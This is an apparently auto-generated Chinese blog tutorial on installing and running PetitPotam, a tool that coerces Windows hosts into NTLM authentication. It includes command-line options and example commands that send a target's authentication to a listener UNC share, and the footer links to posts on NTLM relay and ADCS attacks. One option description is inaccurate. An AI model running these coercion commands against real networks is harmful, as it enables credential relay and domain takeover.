PetitPotam 项目安装与使用教程

最新推荐文章于 2024-09-13 08:43:59 发布
最新推荐文章于 2024-09-13 08:43:59 发布
阅读量246 收藏 8
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00035/article/details/137955119
版权

PetitPotam 项目安装与使用教程

PetitPotam Python implementation for PetitPotam 项目地址: https://gitcode.com/gh_mirrors/pet/PetitPotam

1. 项目的目录结构及介绍

PetitPotam 项目的目录结构如下:

PetitPotam/
├── LICENSE
├── README.md
├── petitpotam.py
└── requirements.txt
  • LICENSE: 项目的许可证文件,采用 MIT 许可证。
  • README.md: 项目的说明文档,包含项目的简介、安装方法、使用示例等内容。
  • petitpotam.py: 项目的主程序文件,用于执行 PetitPotam 攻击。
  • requirements.txt: 项目依赖的 Python 包列表,用于安装所需的依赖库。

2. 项目的启动文件介绍

项目的启动文件是 petitpotam.py。该文件是 PetitPotam 攻击的主要实现文件,包含了攻击所需的逻辑和功能。

启动文件功能介绍

  • Coerce NTLM Authentication: 该脚本通过 MS-EFSRPC 协议强制 Windows 主机进行 NTLM 认证。
  • Debug Mode: 支持调试模式,可以通过 -debug 参数启用调试输出。
  • Customization Options: 提供了多种自定义选项,如指定目标端口、命名管道、认证方法等。

启动命令示例

python3 petitpotam.py -debug '172.16.19.100' '\\172.16.19.1\share\foo'

3. 项目的配置文件介绍

PetitPotam 项目没有传统的配置文件,所有的配置选项都通过命令行参数进行设置。以下是一些常用的配置选项:

  • -port [destination port]: 指定目标端口,默认连接到 MS-RPRN 命名管道。
  • -pipe pipe: 指定使用的命名管道,默认是 lsarpc
  • -method method: 指定用于强制认证的方法。
  • -target-ip ip address: 指定目标机器的 IP 地址。
  • -hashes LMHASH:NTHASH: 使用 NTLM 哈希进行认证。
  • -no-pass: 不提示输入密码(适用于 Kerberos 认证)。
  • -k: 使用 Kerberos 认证,从 ccache 文件中获取凭据。
  • -dc-ip ip address: 指定域控制器的 IP 地址。

配置示例

python3 petitpotam.py -debug -method AddUsersToFile '172.16.19.100' '\\172.16.19.1\share\foo'

以上命令使用 AddUsersToFile 方法强制目标主机进行认证,并将认证请求发送到指定的 UNC 路径。

通过以上步骤,您可以成功安装并使用 PetitPotam 项目进行 NTLM 认证强制攻击。

PetitPotam Python implementation for PetitPotam 项目地址: https://gitcode.com/gh_mirrors/pet/PetitPotam

秋或依
关注
PetitPotam 开源项目使用教程
gitblog_00833的博客
09-03 380
PetitPotam 开源项目使用教程 PetitPotamPython implementation for PetitPotam项目地址:https://gitcode.com/gh_mirrors/pet/PetitPotam 1. 项目的目录结构及介绍 PetitPotam 项目的目录结构如下: PetitPotam/ ├── PetitPotam.exe ├── PetitPotam....
Kerberoast 项目使用教程
gitblog_00203的博客
09-01 306
Kerberoast 项目使用教程 kerberoastKerberoast attack -pure python-项目地址:https://gitcode.com/gh_mirrors/ker/kerberoast 1. 项目的目录结构及介绍 kerberoast/ ├── kerberoast/ │ ├── __init__.py │ ├── asreproast.py │ ├...
MultiPotato 使用教程
gitblog_00068的博客
09-13 910
MultiPotato 使用教程 MultiPotato 项目地址: https://gitcode.com/gh_mirrors/mu/MultiPotato 1. 项目...
RpcView 开源项目教程
gitblog_00628的博客
08-13 703
RpcView 开源项目教程 RpcViewRpcView is a free tool to explore and decompile Microsoft RPC interfaces项目地址:https://gitcode.com/gh_mirrors/rp/RpcView 项目介绍 RpcView 是一个开源工具,用于探索和反编译 Microsoft RPC 接口。该项目由四位法国研究人...
探索JavaWeb内存马:Memory Shell项目详解与实践
gitblog_00080的博客
05-21 321
探索JavaWeb内存马:Memory Shell项目详解与实践 项目地址:https://gitcode.com/su18/MemoryShell 在现代的Web应用开发中,安全问题始终是不容忽视的关键环节。而JavaWeb内存马正是这种安全隐患的一种形式。为了帮助开发者更好地理解和防范这种威胁,我们向您推荐一个开源项目——Memory Shell,它是一个专注于JavaWeb内存马注入、扫描、...
渗透测试 | 详解ADCS证书服务攻击手法
2401_85023531的博客
06-19 1045
2021年6月17日,国外安全研究员 Will Schroeder 和 Lee Christensen 共同发布了针对ADCS(Active Directory Certificate Service, 活动目录证书服务)的攻击手法。同年8月5日,在Black Hat 2021上 Will Schroeder 和 Lee CHristensen 对该攻击手法进行了详细讲解。至此,ADCS攻击第一次进入人们的视野。
域渗透-备忘录
qq_50643984的博客
03-01 701
委派获取的权限在于,委派的用户是谁,被委派什么服务,如果是普通域用户,那就获得普通域用户的票据,如果是域管,那就是域管票据,信息收集可以通过Bloodhuond。例如DC01$委派WIN2016$,那么用win2016的账户进行getST就能获取到DC01的票据了。
ADCS攻击利用
slash_HK的博客
12-23 4836
一万字呕心沥血,全站最详细ADCS攻击利用方法及细节复现,包括服务器配置等,细节满满,支持走一波,也欢迎各位师傅斧正。
一文带你了解NTLM Realy 攻击
2401_85027424的博客
06-19 873
NTLM Realy 攻击其实应该称为Net-NTLM Realy 攻击,它发生在NTLM认证的第三步,在Response 消息中存在Net-NTLM Hash,当攻击者获得了 Net-NTLM Hash 后,可以重放Net-NTLM Hash 进行中间人攻击。NTLM Realy 流程如图所示,攻击者作为中间人在客户端和服务器之间转发NTLM认证数据包,从而模拟客户端身份访问服务端的资源。NTLM Relay 攻击分为两步:第一步是捕获 Net-NTLM Hash;
利用PetitPotam进行NTLM Relay攻击
谢公子的博客
09-18 6237
2021年7月19日,法国安全研究人员Gilles Lionel披露了一种新型的NTLM Relay攻击利用手法——PetitPotam。该漏洞利用了微软加密文件系统远程协议(MS-EFSRPC,MicroSoftEncrypting File System Remote Protocol)。MS-EFSRPC是 Microsoft 的加密文件系统远程协议,用于对远程存储和通过网络访问的加密数据执行“维护和管理操作”。利用该漏洞,黑客通过连接到LSARPC强制触发目标机器向指定远程服务器发送Net-NTL.
使用PetitPotam代替Printerbug
ZAWX_NETSTARSEC的博客
08-19 402
使用PetitPotam代替Printerbug 上帝关了一扇, 必定会再为你打开另一扇窗 0x00 前言 Printerbug使得拥有控制域用户/计算机的攻击者可以指定域内的一台服务器,并使其对攻击者选择的目标进行身份验证。虽然不是一个微软承认的漏洞,但是跟Net-ntlmV1,非约束委派,NTLM_Relay,命名管道模拟这些手法的结合可以用来域内提权,本地提权,跨域等等利用。 遗憾的是,在PrintNightmare爆发之后,很多企业会选择关闭spoolss服务,使得Printerbug失效。在P
【安全漏洞】使用PetitPotam代替Printerbug.md
2201_75660665的博客
12-08 205
不同于LDAP是协商签名的,发起的协议如果是smb就需要修改Flag位,到HTTP的NTLM认证是不签名的。在Printerbug逐渐失效的今天,PetitPotam来了,他也可以指定域内的一台服务器,并使其对攻击者选择的目标进行身份验证。当我们拿到了一台非约束委派的机器,只要诱导别人来访问这台机器就可以拿到那个用户的TGT,在这之前我们一般用printerbug来触发,在这里我们可以用PetitPotamlai来触发。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
ADCS攻击系列【ESC1-8】详解
内心不种满鲜花就会长满杂草
09-11 137
ADCS(Active Directory Certificate Services),是微软提供的一套证书服务解决方案,用于实现公钥基础结构(PKI)的功能,包括证书的产生、管理、存储、分发和撤销等。ADCS能够与现有的Active Directory Domain Services(ADDS)服务结合,用于加密文件系统、数字签名以及身份验证等多种安全应用场景。在ADCS中,证书颁发机构(CA)扮演着核心角色,负责接收证书申请、验证申请者信息、颁发证书以及管理证书的吊销等。
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1288
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
【超强组合】基于VMD-白鹭群优化算法ESOA-Transformer-BiLSTM的光伏预测算研究Matlab实现.rar
10-08
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
vue+springboot基于Javaweb的二手儿童绘本交易系统设计与实现 毕业设计源码.zip
10-08
本系统基于B/S结构模式,采用idea开发环境,建模工具Visio,以及关系型数据库MySQL。 系统采用前后端分离框架vue进行开发。前端开发负责页面的编写及数据的渲染。后端开发负责提供API(接口)。采用了MVC(Model-View-Controller)架构风格,前后端采用指定的API接口进行交互 其主要开发包括后台数据库的设计建立,数据库维护以及前后端应用程序(WEB)设计编码。 前端:vue.js+ElementUI 开发工具:IDEA 或者eclipse都支持 编程语言: java 框架:springboot 数据库: mysql 版本不限 数据库工具:Navicat/SQLyog都可以
基于Spring Boot + Vue的招聘平台系统设计源码
10-08
该系统是一款基于Spring Boot和Vue框架的招聘平台,集成了208个Java源文件、121个Vue组件、93个JavaScript脚本、22个PNG图片、22个CSS样式、20个XML配置、12个JPG图像、11个Markdown文档、10个SCSS样式、7个EJS模板等共计566个文件。系统支持邮箱验证码注册验证功能,旨在提供一个高效便捷的招聘解决方案。
【新组合】基于黏菌优化算法SMA优化BP神经网络实现数据多输入多输出Matlab实现.rar
最新发布
10-08
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
搭建与配置ADCS服务:证书管理与安全漏洞检测
提供了关于ADCS和相关攻击技术的参考资料链接,表明这部分内容是基于PetitPotam NTLM Relay工具的攻击方法,用于演示如何利用NTLM漏洞对ADCS服务进行渗透测试。 这篇文档重点讲述了在Windows环境中设置ADCS、利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋或依

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值